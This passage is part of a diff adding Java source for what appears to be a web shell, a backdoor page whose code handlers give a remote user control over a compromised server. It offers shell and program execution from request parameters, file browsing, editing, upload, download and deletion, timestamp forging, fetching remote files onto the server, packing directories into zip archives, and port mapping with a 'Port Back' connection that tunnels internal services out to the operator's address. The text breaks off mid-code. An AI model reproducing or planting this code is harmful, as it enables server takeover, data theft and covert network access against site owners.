HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String path2View = null; + PrintWriter out = response.getWriter(); + String path = request.getParameter("folder"); + String outEntry = request.getParameter("outentry"); + if (!Util.isEmpty(outEntry) && outEntry.equals("true")) { + JSession.removeAttribute(ENTER); + JSession.removeAttribute(ENTER_MSG); + JSession.removeAttribute(ENTER_CURRENT_DIR); + } + Object enter = JSession.getAttribute(ENTER); + File file = null; + if (!Util.isEmpty(enter)) { + if (Util.isEmpty(path)) { + if (JSession.getAttribute(ENTER_CURRENT_DIR) == null) + path = "/"; + else + path = (String) (JSession + .getAttribute(ENTER_CURRENT_DIR)); + } + file = new EnterFile(path); + ((EnterFile) file).setZf((String) enter); + JSession.setAttribute(ENTER_CURRENT_DIR, path); + } else { + if (Util.isEmpty(path)) + path = JSession.getAttribute(CURRENT_DIR).toString(); + JSession.setAttribute(CURRENT_DIR, Util.convertPath(path)); + file = new File(path); + } + path2View = Util.convertPath(path); + if (!file.exists()) { + throw new Exception(path + "Dont Exists !"); + } + File[] list = file.listFiles(); + Arrays.sort(list, new MyComparator()); + out.println("
"); + String cr = null; + try { + cr = JSession.getAttribute(CURRENT_DIR).toString() + .substring(0, 3); + } catch (Exception e) { + cr = "/"; + } + File currentRoot = new File(cr); + out.println("

File Manager - Current disk "" + + (cr.indexOf("/") == 0 ? "/" : currentRoot.getPath()) + + "" total (unknow)

"); + out + .println("
" + + "" + + " " + + " " + + " " + + " " + + " " + "
Current Directory
" + "
"); + out + .println("" + + "" + "" + + "" + + " " + + " " + + " " + + " " + + " " + ""); + if (file.getParent() != null) { + out + .println("" + + "" + + "" + + ""); + } + int dircount = 0; + int filecount = 0; + for (int i = 0; i < list.length; i++) { + File f = list[i]; + if (f.isDirectory()) { + dircount++; + out + .println("" + + "" + + "" + + "" + + "" + + "" + + ""); + } else { + filecount++; + out + .println("" + + "" + + "" + + "" + + "" + + "" + + ""); + } + } + out + .println("" + + " " + " " + "
" + + "
" + + "Web Root" + + " | Shell Directory" + + " | New Directory | New File" + " | "); + File[] roots = file.listRoots(); + for (int i = 0; i < roots.length; i++) { + File r = roots[i]; + out.println("Disk(" + + Util.convertPath(r.getPath()) + ")"); + if (i != roots.length - 1) { + out.println("|"); + } + } + out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0" + + f.getName() + + "" + + Util.formatDate(f.lastModified()) + + "--" + + f.canRead() + + " / " + + f.canWrite() + + " / unknow"); + if (enter != null) + out.println(" "); + else + out + .println("Del | Move | Pack"); + out.println("
" + + f.getName() + + "" + + Util.formatDate(f.lastModified()) + + "" + + Util.getSize(f.length(), 'B') + + "" + + "" + + f.canRead() + + " / " + + f.canWrite() + + " / unknow " + + "Edit | " + + "Down | " + + "Copy"); + if (enter == null) { + out + .println(" | Move | " + + "Property | " + + "Enter"); + if (f.getName().endsWith(".zip") + || f.getName().endsWith(".jar")) { + out + .println(" | UnPack"); + } else if (f.getName().endsWith(".rar")) { + out + .println(" | UnPack"); + } else { + out + .println(" | Pack"); + } + } + out.println("
 "); + if (enter != null) + out + .println("Pack Selected - Delete Selected"); + else + out + .println("Pack Selected - Delete Selected"); + out.println("" + + dircount + " directories / " + filecount + + " files
"); + out.println("
"); + if (file instanceof EnterFile) + ((EnterFile) file).close(); + } catch (ZipException e) { + JSession.setAttribute(MSG, "\"" + + JSession.getAttribute(ENTER).toString() + + "\" Is Not a Zip File. Please Exit."); + throw e; + } catch (Exception e) { + JSession.setAttribute(MSG, + "File Does Not Exist Or You Dont Have Privilege." + + BACK_HREF); + throw e; + } + } + } + + private static class LogoutInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + Object dbo = JSession.getAttribute(DBO); + if (dbo != null) + ((DBOperator) dbo).close(); + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket s = (ServerSocket) obj; + s.close(); + } + Object online = JSession.getAttribute(SHELL_ONLINE); + if (online != null) + ((OnLineProcess) online).stop(); + JSession.invalidate(); + ((Invoker) ins.get("vLogin")).invoke(request, response, + JSession); + } catch (ClassCastException e) { + JSession.invalidate(); + ((Invoker) ins.get("vLogin")).invoke(request, response, + JSession); + } catch (Exception e) { + + throw e; + } + } + } + + private static class UploadInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + UploadBean fileBean = new UploadBean(); + response.getWriter().println( + JSession.getAttribute(CURRENT_DIR).toString()); + fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR) + .toString()); + fileBean.parseRequest(request); + File f = new File(JSession.getAttribute(CURRENT_DIR) + "/" + + fileBean.getFileName()); + if (f.exists() && f.length() > 0) + JSession + .setAttribute(MSG, + "Upload File Success!"); + else + JSession + .setAttribute("MSG", + "Upload File Failed!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + throw e; + } + } + } + + private static class CopyInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String src = request.getParameter("src"); + String to = request.getParameter("to"); + InputStream in = null; + Object enter = JSession.getAttribute(ENTER); + if (enter == null) + in = new FileInputStream(new File(src)); + else { + ZipFile zf = new ZipFile((String) enter); + ZipEntry entry = zf.getEntry(src); + in = zf.getInputStream(entry); + } + BufferedInputStream input = new BufferedInputStream(in); + BufferedOutputStream output = new BufferedOutputStream( + new FileOutputStream(new File(to))); + byte[] d = new byte[1024]; + int len = input.read(d); + while (len != -1) { + output.write(d, 0, len); + len = input.read(d); + } + output.close(); + input.close(); + JSession.setAttribute(MSG, "Copy File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class BottomInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + response + .getWriter() + .println( + "
Don't break my heart~" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VCreateFileInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + File f = new File(path); + if (!f.isAbsolute()) { + String oldPath = path; + path = JSession.getAttribute(CURRENT_DIR).toString(); + if (!path.endsWith("/")) + path += "/"; + path += oldPath; + f = new File(path); + f.createNewFile(); + } else { + f.createNewFile(); + } + out + .println("
" + + "
" + + "

Create / Edit File »

" + + "" + + "

Current File (import new file name and new file)
" + + "

" + + "

File Content

" + + "

" + + "
" + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VEditInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + String charset = request.getParameter("charset"); + Object enter = JSession.getAttribute(ENTER); + InputStream input = null; + if (enter != null) { + ZipFile zf = new ZipFile((String) enter); + ZipEntry entry = new ZipEntry(path); + input = zf.getInputStream(entry); + } else { + File f = new File(path); + if (!f.exists()) + return; + input = new FileInputStream(path); + } + + BufferedReader reader = null; + if (Util.isEmpty(charset) || charset.equals("ANSI")) + reader = new BufferedReader(new InputStreamReader(input)); + else + reader = new BufferedReader(new InputStreamReader(input, + charset)); + StringBuffer content = new StringBuffer(); + String s = reader.readLine(); + while (s != null) { + content.append(s + "\r\n"); + s = reader.readLine(); + } + reader.close(); + out + .println("
" + + "
" + + "

Create / Edit File »

" + + "" + + "

Current File (import new file name and new file)
" + + "

" + + "

File Content

" + "

"); + if (enter != null) + out + .println(""); + else + out + .println(""); + out + .println("

" + + "
" + "
"); + + } catch (Exception e) { + + throw e; + } + } + } + + private static class CreateFileInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + String content = request.getParameter("filecontent"); + String charset = request.getParameter("charset"); + BufferedWriter outs = null; + if (charset.equals("ANSI")) + outs = new BufferedWriter(new FileWriter(new File(path))); + else + outs = new BufferedWriter(new OutputStreamWriter( + new FileOutputStream(new File(path)), charset)); + outs.write(content, 0, content.length()); + outs.close(); + JSession + .setAttribute( + MSG, + "Save File " + + (new File(path)).getName() + + " With " + + charset + " Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VEditPropertyInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String filepath = request.getParameter("filepath"); + File f = new File(filepath); + if (!f.exists()) + return; + String read = f.canRead() ? "checked=\"checked\"" : ""; + String write = f.canWrite() ? "checked=\"checked\"" : ""; + Calendar cal = Calendar.getInstance(); + cal.setTimeInMillis(f.lastModified()); + + out + .println("
" + + "
" + + "

Set File Property »

" + + "

Current File (FullPath)

" + + " " + + "

" + + " Read " + + " Write " + + "

" + + "

Instead »" + + "year:" + + "" + + "month:" + + "" + + "day:" + + "" + + "" + + "hour:" + + "" + + "minute:" + + "" + + "second:" + + "" + + "

" + + "

" + + "
" + "
"); + } catch (Exception e) { + throw e; + } + } + } + + private static class EditPropertyInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String f = request.getParameter("file"); + File file = new File(f); + if (!file.exists()) + return; + + String year = request.getParameter("year"); + String month = request.getParameter("month"); + String date = request.getParameter("date"); + String hour = request.getParameter("hour"); + String minute = request.getParameter("minute"); + String second = request.getParameter("second"); + + Calendar cal = Calendar.getInstance(); + cal.set(Calendar.YEAR, Integer.parseInt(year)); + cal.set(Calendar.MONTH, Integer.parseInt(month) - 1); + cal.set(Calendar.DATE, Integer.parseInt(date)); + cal.set(Calendar.HOUR, Integer.parseInt(hour)); + cal.set(Calendar.MINUTE, Integer.parseInt(minute)); + cal.set(Calendar.SECOND, Integer.parseInt(second)); + if (file.setLastModified(cal.getTimeInMillis())) { + JSession.setAttribute(MSG, "Reset File Property Success!"); + } else { + JSession + .setAttribute(MSG, + "Reset File Property Failed!"); + } + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + //VShell + private static class VsInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String cmd = request.getParameter("command"); + String program = request.getParameter("program"); + if (cmd == null) { + if (ISLINUX) + cmd = "id"; + else + cmd = "cmd.exe /c set"; + } + if (program == null) + program = "cmd.exe /c net start > " + SHELL_DIR + + "/Log.txt"; + if (JSession.getAttribute(MSG) != null) { + Util.outMsg(out, JSession.getAttribute(MSG).toString()); + JSession.removeAttribute(MSG); + } + out + .println("" + + "
" + + "
" + + "

Execute Program »

" + + "

" + + "" + + "" + + "Parameter
" + + "" + + "

" + + "
" + + "
" + + "

Execute Shell »

" + + "

" + + "" + + "" + + "Parameter
" + + "" + + "

" + + "
" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class ShellInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + if (type.equals("command")) { + ((Invoker) ins.get("vs")).invoke(request, response, + JSession); + out.println("
"); + out.println("
");
+					String command = request.getParameter("command");
+					if (!Util.isEmpty(command)) {
+						Process pro = Runtime.getRuntime().exec(command);
+						BufferedReader reader = new BufferedReader(
+								new InputStreamReader(pro.getInputStream()));
+						String s = reader.readLine();
+						while (s != null) {
+							out.println(Util.htmlEncode(Util.getStr(s)));
+							s = reader.readLine();
+						}
+						reader.close();
+						reader = new BufferedReader(new InputStreamReader(pro
+								.getErrorStream()));
+						s = reader.readLine();
+						while (s != null) {
+							out.println(Util.htmlEncode(Util.getStr(s)));
+							s = reader.readLine();
+						}
+						reader.close();
+						out.println("
"); + } + } else { + String program = request.getParameter("program"); + if (!Util.isEmpty(program)) { + Process pro = Runtime.getRuntime().exec(program); + JSession.setAttribute(MSG, "Program Has Run Success!"); + ((Invoker) ins.get("vs")).invoke(request, response, + JSession); + } + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class DownInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String path = request.getParameter("path"); + if (Util.isEmpty(path)) + return; + InputStream i = null; + Object enter = JSession.getAttribute(ENTER); + String fileName = null; + if (enter == null) { + File f = new File(path); + if (!f.exists()) + return; + fileName = f.getName(); + i = new FileInputStream(f); + } else { + ZipFile zf = new ZipFile((String) enter); + ZipEntry entry = new ZipEntry(path); + fileName = entry.getName().substring( + entry.getName().lastIndexOf("/") + 1); + i = zf.getInputStream(entry); + } + response.setHeader("Content-Disposition", + "attachment;filename=" + + URLEncoder.encode(fileName, PAGE_CHARSET)); + BufferedInputStream input = new BufferedInputStream(i); + BufferedOutputStream output = new BufferedOutputStream(response + .getOutputStream()); + byte[] data = new byte[1024]; + int len = input.read(data); + while (len != -1) { + output.write(data, 0, len); + len = input.read(data); + } + input.close(); + output.close(); + } catch (Exception e) { + + throw e; + } + } + } + + //VDown + private static class VdInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String savepath = request.getParameter("savepath"); + String url = request.getParameter("url"); + if (Util.isEmpty(url)) + url = "http://www.baidu.com/"; + if (Util.isEmpty(savepath)) { + savepath = JSession.getAttribute(CURRENT_DIR).toString(); + } + if (!Util.isEmpty(JSession.getAttribute("done"))) { + Util.outMsg(out, "Download Remote File Success!"); + JSession.removeAttribute("done"); + } + out + .println("
" + + "
" + + "

Remote File DownLoad »

" + + "

" + + "" + + "

File   URL: " + + "

" + + "

Save Path: " + + "

" + + "" + + "

" + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class DownRemoteInvoker extends DefaultInvoker { + public boolean doBefore() { + return true; + } + + public boolean doAfter() { + return true; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String downFileUrl = request.getParameter("url"); + String savePath = request.getParameter("savepath"); + if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) + return; + URL downUrl = new URL(downFileUrl); + URLConnection conn = downUrl.openConnection(); + + File tempF = new File(savePath); + File saveF = tempF; + if (tempF.isDirectory()) { + String fName = downFileUrl.substring(downFileUrl + .lastIndexOf("/") + 1); + saveF = new File(tempF, fName); + } + BufferedInputStream in = new BufferedInputStream(conn + .getInputStream()); + BufferedOutputStream out = new BufferedOutputStream( + new FileOutputStream(saveF)); + byte[] data = new byte[1024]; + int len = in.read(data); + while (len != -1) { + out.write(data, 0, len); + len = in.read(data); + } + in.close(); + out.close(); + JSession.setAttribute("done", "d"); + ((Invoker) ins.get("vd")).invoke(request, response, JSession); + } catch (Exception e) { + + throw e; + } + } + } + + private static class IndexInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + ((Invoker) ins.get("filelist")).invoke(request, response, + JSession); + } catch (Exception e) { + + throw e; + } + } + } + + private static class MkDirInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String name = request.getParameter("name"); + File f = new File(name); + if (!f.isAbsolute()) { + String path = JSession.getAttribute(CURRENT_DIR).toString(); + if (!path.endsWith("/")) + path += "/"; + path += name; + f = new File(path); + } + f.mkdirs(); + JSession.setAttribute(MSG, "Make Directory Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class MoveInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String src = request.getParameter("src"); + String target = request.getParameter("to"); + if (!Util.isEmpty(target) && !Util.isEmpty(src)) { + File file = new File(src); + if (file.renameTo(new File(target))) { + JSession.setAttribute(MSG, "Move File Success!"); + } else { + String msg = "Move File Failed!"; + if (file.isDirectory()) { + msg += "The Move Will Failed When The Directory Is Not Empty."; + } + JSession.setAttribute(MSG, msg); + } + response.sendRedirect(SHELL_NAME); + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class RemoveDirInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String dir = request.getParameter("dir"); + File file = new File(dir); + if (file.exists()) { + deleteFile(file); + deleteDir(file); + } + + JSession.setAttribute(MSG, "Remove Directory Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + + public void deleteFile(File f) { + if (f.isFile()) { + f.delete(); + } else { + File[] list = f.listFiles(); + for (int i = 0; i < list.length; i++) { + File ff = list[i]; + deleteFile(ff); + } + } + } + + public void deleteDir(File f) { + File[] list = f.listFiles(); + if (list.length == 0) { + f.delete(); + } else { + for (int i = 0; i < list.length; i++) { + File ff = list[i]; + deleteDir(ff); + } + deleteDir(f); + } + } + } + + private static class PackBatchInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String files = request.getParameter("files"); + if (Util.isEmpty(files)) + return; + String saveFileName = request.getParameter("savefilename"); + File saveF = new File(JSession.getAttribute(CURRENT_DIR) + .toString(), saveFileName); + if (saveF.exists()) { + JSession.setAttribute(MSG, "The File \"" + saveFileName + + "\" Has Been Exists!"); + response.sendRedirect(SHELL_NAME); + return; + } + ZipOutputStream zout = new ZipOutputStream( + new BufferedOutputStream(new FileOutputStream(saveF))); + String[] arr = files.split(","); + for (int i = 0; i < arr.length; i++) { + String f = arr[i]; + File pF = new File(JSession.getAttribute(CURRENT_DIR) + .toString(), f); + ZipEntry entry = new ZipEntry(pF.getName()); + zout.putNextEntry(entry); + FileInputStream fInput = new FileInputStream(pF); + int len = 0; + byte[] buf = new byte[1024]; + while ((len = fInput.read(buf)) != -1) { + zout.write(buf, 0, len); + zout.flush(); + } + fInput.close(); + } + zout.close(); + JSession.setAttribute(MSG, "Pack Files Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VPackConfigInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String packfile = request.getParameter("packedfile"); + String currentd = JSession.getAttribute(CURRENT_DIR).toString(); + out + .println("
" + + "" + + "" + + "" + + " " + + " " + + " " + "

Pack Configuration >>

" + + "
" + + " " + + " " + + " " + + " " + + " " + + " " + + " " + " " + + "
" + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + "
Packed Dir
Save To
Ext Filter" + + " no Blacklist Whitelist" + + "
" + + "
Filesize Filter(KB) " + + " no greaterthanlessthan
Exclude Dir
" + + " " + + "
" + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class PackInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + private boolean config = false; + private String extFilter = "blacklist"; + private String[] fileExts = null; + private String sizeFilter = "no"; + private int filesize = 0; + private String[] exclude = null; + private String packFile = null; + + private void reset() { + this.config = false; + this.extFilter = "blacklist"; + this.fileExts = null; + this.sizeFilter = "no"; + this.filesize = 0; + this.exclude = null; + this.packFile = null; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String config = request.getParameter("config"); + if (!Util.isEmpty(config) && config.equals("true")) { + this.config = true; + this.extFilter = request.getParameter("extfilter"); + this.fileExts = request.getParameter("fileext").split(","); + this.sizeFilter = request.getParameter("sizefilter"); + this.filesize = Integer.parseInt(request + .getParameter("filesize")); + this.exclude = request.getParameter("exclude").split(","); + } + String packedFile = request.getParameter("packedfile"); + if (Util.isEmpty(packedFile)) + return; + this.packFile = packedFile; + String saveFileName = request.getParameter("savefilename"); + File saveF = null; + if (this.config) + saveF = new File(saveFileName); + else + saveF = new File(JSession.getAttribute(CURRENT_DIR) + .toString(), saveFileName); + if (saveF.exists()) { + JSession.setAttribute(MSG, "The File \"" + saveFileName + + "\" Has Been Exists!"); + response.sendRedirect(SHELL_NAME); + return; + } + File pF = new File(packedFile); + ZipOutputStream zout = null; + String base = ""; + if (pF.isDirectory()) { + if (pF.listFiles().length == 0) { + JSession + .setAttribute(MSG, + "No File To Pack ! Maybe The Directory Is Empty ."); + response.sendRedirect(SHELL_NAME); + this.reset(); + return; + } + zout = new ZipOutputStream(new BufferedOutputStream( + new FileOutputStream(saveF))); + zipDir(pF, base, zout); + } else { + zout = new ZipOutputStream(new BufferedOutputStream( + new FileOutputStream(saveF))); + zipFile(pF, base, zout); + } + zout.close(); + this.reset(); + JSession.setAttribute(MSG, "Pack File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + throw e; + } + } + + public void zipDir(File f, String base, ZipOutputStream zout) + throws Exception { + if (f.isDirectory()) { + if (this.config) { + String curName = f.getAbsolutePath().replace('\\', '/'); + curName = curName.replaceAll("\\Q" + this.packFile + "\\E", + ""); + if (this.exclude != null) { + for (int i = 0; i < exclude.length; i++) { + if (!Util.isEmpty(exclude[i]) + && curName.startsWith(exclude[i])) { + return; + } + } + } + } + File[] arr = f.listFiles(); + for (int i = 0; i < arr.length; i++) { + File ff = arr[i]; + String tmpBase = base; + if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) + tmpBase += "/"; + zipDir(ff, tmpBase + f.getName(), zout); + } + } else { + String tmpBase = base; + if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) + tmpBase += "/"; + zipFile(f, tmpBase, zout); + } + + } + + public void zipFile(File f, String base, ZipOutputStream zout) + throws Exception { + if (this.config) { + String ext = f.getName().substring( + f.getName().lastIndexOf('.') + 1); + if (this.extFilter.equals("blacklist")) { + if (Util.exists(this.fileExts, ext)) { + return; + } + } else if (this.extFilter.equals("whitelist")) { + if (!Util.exists(this.fileExts, ext)) { + return; + } + } + if (!this.sizeFilter.equals("no")) { + double size = f.length() / 1024; + if (this.sizeFilter.equals("greaterthan")) { + if (size < filesize) + return; + } else if (this.sizeFilter.equals("lessthan")) { + if (size > filesize) + return; + } + } + } + ZipEntry entry = new ZipEntry(base + f.getName()); + zout.putNextEntry(entry); + FileInputStream fInput = new FileInputStream(f); + int len = 0; + byte[] buf = new byte[1024]; + while ((len = fInput.read(buf)) != -1) { + zout.write(buf, 0, len); + zout.flush(); + } + fInput.close(); + } + } + + private static class UnPackInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String savepath = request.getParameter("savepath"); + String zipfile = request.getParameter("zipfile"); + if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) + return; + File save = new File(savepath); + save.mkdirs(); + ZipFile file = new ZipFile(new File(zipfile)); + Enumeration e = file.entries(); + while (e.hasMoreElements()) { + ZipEntry en = (ZipEntry) e.nextElement(); + String entryPath = en.getName(); + int index = entryPath.lastIndexOf("/"); + if (index != -1) + entryPath = entryPath.substring(0, index); + File absEntryFile = new File(save, entryPath); + if (!absEntryFile.exists() + && (en.isDirectory() || en.getName().indexOf("/") != -1)) + absEntryFile.mkdirs(); + BufferedOutputStream output = null; + BufferedInputStream input = null; + try { + output = new BufferedOutputStream(new FileOutputStream( + new File(save, en.getName()))); + input = new BufferedInputStream(file.getInputStream(en)); + byte[] b = new byte[1024]; + int len = input.read(b); + while (len != -1) { + output.write(b, 0, len); + len = input.read(b); + } + } catch (Exception ex) { + } finally { + try { + if (output != null) + output.close(); + if (input != null) + input.close(); + } catch (Exception ex1) { + } + } + } + file.close(); + JSession.setAttribute(MSG, "UnPack File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + //VMapPort + private static class VmpInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + Object localIP = JSession.getAttribute("localIP"); + Object localPort = JSession.getAttribute("localPort"); + Object remoteIP = JSession.getAttribute("remoteIP"); + Object remotePort = JSession.getAttribute("remotePort"); + Object done = JSession.getAttribute("done"); + + JSession.removeAttribute("localIP"); + JSession.removeAttribute("localPort"); + JSession.removeAttribute("remoteIP"); + JSession.removeAttribute("remotePort"); + JSession.removeAttribute("done"); + + if (Util.isEmpty(localIP)) + localIP = InetAddress.getLocalHost().getHostAddress(); + if (Util.isEmpty(localPort)) + localPort = "3389"; + if (Util.isEmpty(remoteIP)) + remoteIP = "www.baidu.com"; + if (Util.isEmpty(remotePort)) + remotePort = "80"; + if (!Util.isEmpty(done)) + Util.outMsg(out, done.toString()); + + out + .println("
" + + "" + + " " + + " " + + " " + "" + "

PortMap >>

" + + "
" + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + " " + "

Local Ip :" + + " " + + " 		Local Port :" + + " Remote Ip :" + + " Remote Port :" + + "

" + + " " + + " " + + "
" + + "
" + "
" + + "
"); + String targetIP = request.getParameter("targetIP"); + String targetPort = request.getParameter("targetPort"); + String yourIP = request.getParameter("yourIP"); + String yourPort = request.getParameter("yourPort"); + if (Util.isEmpty(targetIP)) + targetIP = "127.0.0.1"; + if (Util.isEmpty(targetPort)) + targetPort = "3389"; + if (Util.isEmpty(yourIP)) + yourIP = request.getRemoteAddr(); + if (Util.isEmpty(yourPort)) + yourPort = "53"; + out + .println("
" + + "" + + " " + + " " + + " " + "" + "

Port Back >>

" + + "
" + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + " " + "

Target Ip :" + + " " + + " 		Target Port :" + + " Your Ip :" + + " Your Port :" + + "

" + + " " + + "
" + + "
" + "
" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + //StopMapPort + private static class SmpInvoker extends DefaultInvoker { + public boolean doAfter() { + return true; + } + + public boolean doBefore() { + return true; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket server = (ServerSocket) JSession + .getAttribute(PORT_MAP); + server.close(); + } + JSession.setAttribute("done", "Stop Success!"); + ((Invoker) ins.get("vmp")).invoke(request, response, JSession); + } catch (Exception e) { + + throw e; + } + } + } + + //PortBack + private static class PortBackInvoker extends DefaultInvoker { + public boolean doAfter() { + return true; + } + + public boolean doBefore() { + return true; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String targetIP = request.getParameter("targetIP"); + String targetPort = request.getParameter("targetPort"); + String yourIP = request.getParameter("yourIP"); + String yourPort = request.getParameter("yourPort"); + Socket yourS = new Socket(); + yourS.connect(new InetSocketAddress(yourIP, Integer + .parseInt(yourPort))); + Socket targetS = new Socket(); + targetS.connect(new InetSocketAddress(targetIP, Integer + .parseInt(targetPort))); + StreamConnector.readFromLocal(new DataInputStream(targetS + .getInputStream()), new DataOutputStream(yourS + .getOutputStream())); + StreamConnector.readFromRemote(targetS, yourS, + new DataInputStream(yourS.getInputStream()), + new DataOutputStream(targetS.getOutputStream())); + JSession.setAttribute("done", "Port Back Success !"); + ((Invoker) ins.get("vmp")).invoke(request, response, JSession); + } catch (Exception e) { + + throw e; + } + } + } + + private static class MapPortInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String localIP = request.getParameter("localIP"); + String localPort = request.getParameter("localPort"); + final String remoteIP = request.getParameter("remoteIP"); + final String remotePort = request.getParameter("remotePort"); + if (Util.isEmpty(localIP) || Util.isEmpty(localPort) + || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) + return; + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket s = (ServerSocket) obj; + s.close(); + } + final ServerSocket server = new ServerSocket(); + server.bind(new InetSocketAddress(localIP, Integer + .parseInt(localPort))); + JSession.setAttribute(PORT_MAP, server); + new Thread(new Runnable() { + public void run() { + while (true) { + Socket soc = null; + Socket remoteSoc = null; + DataInputStream remoteIn = null; + DataOutputStream remoteOut = null; + DataInputStream localIn = null; + DataOutputStream localOut = null; + try { + soc = server.accept(); + remoteSoc = new Socket(); + remoteSoc + .connect(new InetSocketAddress( + remoteIP, Integer + .parseInt(remotePort))); + remoteIn = new DataInputStream(remoteSoc + .getInputStream()); + remoteOut = 